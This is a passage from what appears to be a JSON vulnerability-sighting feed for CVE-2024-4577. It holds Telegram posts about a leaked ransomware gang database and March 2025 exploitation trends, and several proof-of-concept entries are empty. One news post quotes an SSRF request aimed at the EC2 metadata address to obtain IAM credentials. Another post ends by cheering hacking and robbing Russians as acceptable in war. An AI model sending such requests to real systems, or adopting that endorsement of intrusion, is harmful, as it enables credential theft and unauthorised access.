\u0441\u043f\u0440\u0438\u0439\u043c\u0430\u0442\u0438 \u0442\u0438\u0445 \u043d\u0404\u0434\u043e\u0431\u0456\u0442\u0438\u0448\u0435\u0439 \u0432 \u0441\u0435\u0440\u0439\u043e\u0437\n\n\ud83d\udcac \u0422\u0430\u0431\u043b\u0438\u0446\u044f Chats \u043c\u0456\u0441\u0442\u0438\u0442\u044c \u043b\u0438\u0441\u0442\u0443\u0432\u0430\u043d\u043d\u044f \u043a\u0430\u043a\u0435\u0440\u0456\u0432 \u0437 \u0436\u0435\u0440\u0442\u0432\u0430\u043c\u0438, \u0442\u0430 \u0440\u043e\u0437\u043a\u0440\u0438\u0432\u0430\u0454 \u0444\u043e\u0440\u043c\u0438 \u0442\u0430 \u0437\u0430\u0441\u043e\u0431\u0438 \u043f\u0441\u0438\u0445\u043e\u043b\u043e\u0433\u0456\u0447\u043d\u043e\u0433\u043e \u0442\u0438\u0441\u043a\u0443, \u0442\u0430 \u0446\u0456\u043a\u0430\u0432\u0456 \u0430\u0441\u043f\u0435\u043a\u0442\u0438 \u043f\u043e\u0432\u0435\u0434\u0456\u043d\u043a\u0438 \u0448\u0438\u0444\u0440\u0443\u0432\u0430\u043b\u044c\u043d\u0438\u043a\u0456\u0432\n\n\ud83e\udd11 btc_adresses \u043c\u0456\u0441\u0442\u0438\u0442\u044c 59 975 \u0430\u0434\u0440\u0435\u0441\u0456\u0432 \u0442\u0430 \u0434\u043e\u0437\u0432\u043e\u043b\u044f\u0454 \u0433\u043b\u044f\u043d\u0443\u0442\u0438 \u0441\u043a\u0456\u043b\u044c\u043a\u0438 \u0440\u0435\u0430\u043b\u044c\u043d\u043e \u0432\u043e\u043d\u0438 \u0437\u0430\u0440\u043e\u0431\u043b\u044f\u043b\u0438, \u0441\u043f\u043e\u0439\u043b\u0435\u0440: \u043d\u0435 \u0442\u0430\u043a \u0456 \u0431\u0430\u0433\u0430\u0442\u043e\n\n\u2699\ufe0f builds - \u043c\u0456\u0441\u0442\u0438\u0442\u044c \u043b\u0435\u0434\u044c \u043d\u0435 \u043f\u043e\u0432\u043d\u0443 \u0456\u043d\u0444\u0443 \u043f\u0440\u043e \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u0456 \u0437\u0431\u043e\u0440\u043a\u0438 \u0432\u0456\u0440\u0443\u0441\u0456\u0432 \u0442\u0430 \u043d\u0430\u0432\u0456\u0442\u044c \u0456\u043d\u0444\u0443 \u043f\u0440\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u0457 \u044f\u043a\u0456 \u0430\u0442\u0430\u043a\u0443\u0432\u0430\u043b\u0438, \u0449\u043e \u0434\u043e\u0437\u0432\u043e\u043b\u044f\u0454 \u0437\u0440\u043e\u0437\u0443\u043c\u0456\u0442\u0438 \u043b\u043e\u0433\u0456\u043a\u0443 \u0442\u0430 \u043f\u0440\u0438\u043d\u0446\u0438\u043f \u0430\u0442\u0430\u043a \u0442\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044f, \u0442\u0430 \u0441\u0443\u0442\u0442\u0454\u0432\u043e \u0434\u043e\u043f\u043e\u043c\u043e\u0436\u0435 \u0443 \u0437\u0430\u0445\u0438\u0441\u0442\u0456 \n\n\u2620\ufe0f \u043f\u043e\u043b\u043e\u043c\u0430\u043b\u0438 \u0457\u0445 \u0437\u0430\u0432\u0434\u044f\u043a\u0438 CVE-2024-4577, \u0449\u043e \u0431\u0443\u043b\u0430 \u0432 PHP 8.1.2. \n\n\ud83e\udd13 \u0414\u043e\u0432\u0456\u0434\u043a\u043e\u0432\u043e, \u0434\u0435\u0441\u044c \u0442\u0430\u043a \u0441\u0430\u043c\u043e, \u0448\u043b\u044f\u0445\u043e\u043c \u043f\u0443\u0431\u043b\u0456\u0447\u043d\u043e\u0433\u043e \u0437\u043b\u0438\u0432\u0443 \u0432\u0441\u0456\u0445 \u0444\u043e\u0440\u043c \u0442\u0430 \u0437\u0430\u0441\u043e\u0431\u0456\u0432 \u0437\u043d\u0438\u0449\u0438\u043b\u0438 \u0457\u0445 \u00ab\u043a\u043e\u043b\u0435\u0433 \u043f\u043e \u0446\u0435\u0445\u0443\u00bb \u0437 Conti, Black Basta \u0442\u0430 Everest\n\n\ud83d\udd11 \u0417\u043e\u043b\u043e\u0442\u0430 \u0435\u043f\u043e\u0445\u0430 \u0448\u0438\u0444\u0440\u0443\u0432\u0430\u043b\u044c\u043d\u0438\u043a\u0456\u0432 \u043f\u0456\u0434\u0445\u043e\u0434\u0438\u0442\u044c \u0434\u043e \u0441\u0432\u043e\u0433\u043e \u043b\u043e\u0433\u0456\u0447\u043d\u043e\u0433\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u044f, \u044f\u043a \u0441\u0432\u043e\u0433\u043e \u0447\u0430\u0441\u0443 \u043f\u0456\u0434\u0456\u0439\u0448\u043b\u0430 \u043a \u043a\u0456\u043d\u0446\u044e \u0456 \u0437\u043e\u043b\u043e\u0442\u0430 \u0435\u043f\u043e\u0445\u0430 \u0431\u0430\u043d\u043a\u0456\u0432\u0441\u044c\u043a\u0438\u0445 \u0442\u0440\u043e\u044f\u043d\u0456\u0432, \u044f\u043a\u0456 \u0442\u0435\u0436 \u043c\u0430\u043b\u0438 \u0441\u0432\u043e\u0457 \u00ab\u043f\u0430\u0440\u0442\u043d\u0435\u0440\u0441\u044c\u043a\u0456 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0438\u00bb \n\n\ud83e\udd47 \u043f\u0435\u0440\u0448\u0456 - \u0437\u0430\u0432\u0436\u0434\u0438 \u0437\u043d\u0456\u043c\u0430\u044e\u0442\u044c \u00ab\u0441\u043b\u0456\u0432\u043a\u0456\u00bb, \u0430 \u043a\u043e\u043b\u0438 \u0434\u043e\u0445\u043e\u0434\u0438\u0442\u044c \u0434\u043e \u00ab\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u0443\u0432\u0430\u043d\u043d\u044f\u00bb \u0456 \u00ab\u0442\u0404\u043c\u0430\u00bb \u0441\u0442\u0430\u0454 \u043f\u0443\u0431\u043b\u0456\u0447\u043d\u043e\u044e - \u0457\u0457 \u0437\u043b\u0438\u0432\u0430\u044e\u0442\u044c \ud83e\udd37\u200d\u2642\ufe0f \u043f\u0440\u0438\u0447\u043e\u043c\u0443 \u044f\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0437 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0438, \u0430\u0431\u043e \u00ab\u043a\u043e\u043b\u0435\u0433\u0438 \u043f\u043e \u0446\u0435\u0445\u0443\u00bb\n\n\u0422\u0443\u0442 \u044f\u043a \u0437 \u0444\u043e\u043a\u0443\u0441\u043d\u0438\u043a\u0430\u043c\u0438 \u0442\u0430 \u0456\u043b\u044e\u0437\u0456\u043e\u043d\u0456\u0441\u0442\u0430\u043c\u0438: \u043d\u0430 100 \u043b\u044e\u0434\u0435\u0439 \u044f\u043a\u0456 \u043f\u0440\u0438\u0439\u0434\u0443\u0442\u044c \u043f\u043e\u0434\u0438\u0432\u0438\u0442\u0438\u0441\u044f \u0444\u043e\u043a\u0443\u0441, \u0437\u043d\u0430\u0439\u0434\u0435\u0442\u044c\u0441\u044f 100 \u0442\u0438\u0441 \u0442\u0438\u0445, \u0445\u0442\u043e \u0445\u043e\u0447\u0435 \u0437\u0440\u043e\u0437\u0443\u043c\u0456\u0442\u0438 \u044f\u043a \u0441\u0430\u043c\u0435 \u043f\u0440\u0430\u0446\u044e\u0454 \u0444\u043e\u043a\u0443\u0441, \u0442\u0430 \u0432\u0438\u043a\u0440\u0438\u0442\u0438 \u0456\u043b\u043b\u044e\u0437\u0456\u043e\u043d\u0456\u0441\u0442\u0430. \u0406 \u0432\u0440\u0430\u0445\u043e\u0432\u0443\u044e\u0447\u0438 \u0442\u0435, \u0449\u043e \u0432\u0456\u0434\u0435\u043e \u0437 \u0432\u0438\u043a\u0440\u0438\u0432\u0430\u043d\u043d\u044f\u043c \u0444\u043e\u043a\u0443\u0441\u043d\u0438\u043a\u0430, \u044f\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043d\u0430\u0431\u0438\u0440\u0430\u0454 \u0431\u0456\u043b\u044c\u0448\u0435 \u043f\u0435\u0440\u0435\u0433\u043b\u044f\u0434\u0456\u0432 \u043d\u0456\u0436 \u0441\u0430\u043c \u0444\u043e\u043a\u0443\u0441 - \u043a\u0440\u0430\u0449\u0435 \u0431\u0443\u0442\u0438 \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u0456 \u0432\u0438\u043a\u0440\u0438\u0432\u0430\u0447\u0456\u0432 \ud83e\udd13 \u0430\u0431\u043e \u043b\u043e\u043c\u0430\u0442\u0438 \u0456 \u0433\u0440\u0430\u0431\u0443\u0432\u0430\u0442\u0438 \u0440\u0430\u0448\u0438\u0441\u0442\u0456\u0432, \u0431\u043e \u043d\u0430 \u0432\u0456\u0439\u043d\u0456 : \u0446\u0435 \u043e\u043a \ud83d\ude1c\n\n\u0421\u0442\u0430\u0432\u0430\u0439\u0442\u0435 \u00ab\u0431\u0456\u043b\u0438\u043c\u0438 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438\u00bb \ud83d\ude07", "creation_timestamp": "2025-05-08T10:41:05.000000Z"}, {"uuid": "98febee4-e3a7-40e9-b7dd-1adaa6442cd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/3LPs86CTupV_UsDNSnboCcqxGlpBquJypjihLBnDsn6A9pQ", "content": "", "creation_timestamp": "2025-07-23T09:00:05.000000Z"}, {"uuid": "e7a9fe9b-9a56-463d-a94d-a3142d608a5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/0wrqT-Y0ZT6aZxb3G7dw-myGUZ24NYkbA_Q0tAhYejl60HA", "content": "", "creation_timestamp": "2025-07-16T03:00:05.000000Z"}, {"uuid": "4cbdc381-b402-45e1-a099-fb8d70ceef17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/dhQS4aSRkzBP2xNhTxgWl93oTI3lydcQezpn91ZDL8rkFTo", "content": "", "creation_timestamp": "2025-07-11T15:00:06.000000Z"}, {"uuid": "80af6a27-88e1-49d8-b9d5-f5c998f4f1f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/itsec_news/5762", "content": "\u200b\u26a1\ufe0f\u0421\u0442\u0430\u0440\u044b\u0439 CVE, \u043d\u043e\u0432\u044b\u0439 \u0437\u0430\u0445\u043e\u0434. 69 000 \u0430\u0442\u0430\u043a \u2014 \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435\n\n\ud83d\udcac \u041c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0430 \u043e\u0437\u043d\u0430\u043c\u0435\u043d\u043e\u0432\u0430\u043b\u0441\u044f \u043d\u043e\u0432\u043e\u0439 \u0432\u0441\u043f\u044b\u0448\u043a\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u043e\u0432, \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u043d\u043e\u0439 \u0441\u0440\u0430\u0437\u0443 \u0432 \u0434\u0432\u0443\u0445 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u0445 \u2014 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 AWS \u0447\u0435\u0440\u0435\u0437 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 SSRF (Server-Side Request Forgery). \u0410\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u043a\u0430\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u043f\u0440\u0438\u0446\u0435\u043b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0438 \u043a\u0430\u043a\u0438\u0435 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b.\n\n\u0410\u0431\u0441\u043e\u043b\u044e\u0442\u043d\u044b\u043c \u043b\u0438\u0434\u0435\u0440\u043e\u043c \u043f\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u043d\u043e\u0432\u0430 \u0441\u0442\u0430\u043b\u0430 CVE-2017-9841 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 9.8) \u2014 \u0441\u0442\u0430\u0440\u0430\u044f, \u043d\u043e \u0432\u043e\u0441\u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHPUnit, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u043a\u043e\u0434. \u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430 \u043c\u0430\u0440\u0442 \u0431\u044b\u043b\u043e \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043f\u043e\u0447\u0442\u0438 70 \u0442\u044b\u0441\u044f\u0447 \u0440\u0430\u0437. \u041f\u0440\u0438\u0447\u0451\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043a \u043e\u0448\u0438\u0431\u043a\u0435 \u0440\u0435\u0437\u043a\u043e \u0432\u043e\u0437\u0440\u043e\u0441 \u0435\u0449\u0451 \u0432 \u043c\u0430\u0435 2024 \u0433\u043e\u0434\u0430 \u0438 \u0441 \u0442\u0435\u0445 \u043f\u043e\u0440 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432\u043e\u043b\u043d\u0430\u043c\u0438. \u0422\u0430\u043a\u0430\u044f \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0430 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u0443\u044e \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0441\u0451 \u0435\u0449\u0451 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f PHPUnit.\n\n\u0412\u0442\u043e\u0440\u043e\u0435 \u043c\u0435\u0441\u0442\u043e \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043b\u0430 CVE-2023-1389 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 8.8), \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u043c\u0438 TP-Link Archer AX21. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. \u0414\u0430\u0436\u0435 \u0441 \u0443\u0447\u0451\u0442\u043e\u043c \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u0432 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439, \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u043e\u0441\u0442\u0430\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0435\u0437\u0430\u043a\u0440\u044b\u0442\u044b\u043c\u0438 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u2014 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u0440\u0435\u0447\u044c \u0438\u0434\u0451\u0442 \u043e \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430\u043c\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u0440\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u0435.\n\n\u0422\u0440\u0435\u0442\u044c\u044e \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u0437\u0430\u043d\u044f\u043b\u0430 CVE-2024-4577 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 9.8) \u2014 \u0441\u0432\u0435\u0436\u0430\u044f \u0438 \u043e\u043f\u0430\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP-CGI \u043d\u0430 Windows, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0431\u0430\u0433 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432. \u0412 \u0430\u0442\u0430\u043a\u0430\u0445 \u0441 \u0435\u0451 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043c\u0430\u0439\u043d\u0435\u0440\u044b \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442, \u0431\u043e\u0442\u043d\u0435\u0442\u044b \u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0435 \u0442\u0440\u043e\u044f\u043d\u044b. \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c PHP, \u043d\u043e \u0438 \u043f\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043e\u0442\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c\u0441\u044f \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f CGI-\u0440\u0435\u0436\u0438\u043c\u0430 \u0432 \u043f\u043e\u043b\u044c\u0437\u0443 \u0431\u043e\u043b\u0435\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0433\u043e PHP-FPM.\n\n\u041d\u0435 \u0442\u0435\u0440\u044f\u0435\u0442 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u0438 \u0438 CVE-2019-9082 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 8.8), \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 ThinkPHP, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0432\u043e\u0437\u0440\u0430\u0441\u0442, \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u0435\u0442 \u043e\u0431\u0449\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443: \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0430\u0442\u0430\u043a \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0447\u0435\u0442\u044b\u0440\u0451\u0445\u043b\u0435\u0442\u043d\u0435\u0439 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438.\n\n\u041e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 \u043c\u0430\u0440\u0442\u0435 \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b Amazon. \u0412 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0434\u043d\u0435\u0439 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 EC2 Instance Metadata \u0447\u0435\u0440\u0435\u0437 SSRF. \u0410\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043a\u0440\u0430\u0442\u043a\u043e\u0441\u0440\u043e\u0447\u043d\u044b\u043c\u0438, \u043d\u043e \u0445\u043e\u0440\u043e\u0448\u043e \u0441\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438: \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c GET-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0430\u0434\u0440\u0435\u0441\u0430\u043c \u0432\u0440\u043e\u0434\u0435 /?url= http://169.254.169.254/latest/meta-data/ , \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 (target, file, uri \u0438 \u0434\u0440.). \u0426\u0435\u043b\u044c \u2014 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c EC2, \u0432\u043a\u043b\u044e\u0447\u0430\u044f IAM-\u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e. \u0412\u0441\u0435 \u0430\u0442\u0430\u043a\u0438 \u0448\u043b\u0438 \u0441 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u043e\u0434\u043d\u043e\u0433\u043e \u0430\u0432\u0442\u043e\u043d\u043e\u043c\u043d\u043e\u0433\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u043d\u043e\u043c\u0435\u0440\u0430, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0435\u0433\u043e \u0444\u0440\u0430\u043d\u0446\u0443\u0437\u0441\u043a\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0441 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0430\u043c\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0435\u0434\u0438\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b.\n\n\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0430 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 \u0437\u0430\u0449\u0438\u0442\u0443 \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u0427\u0442\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a, AWS \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 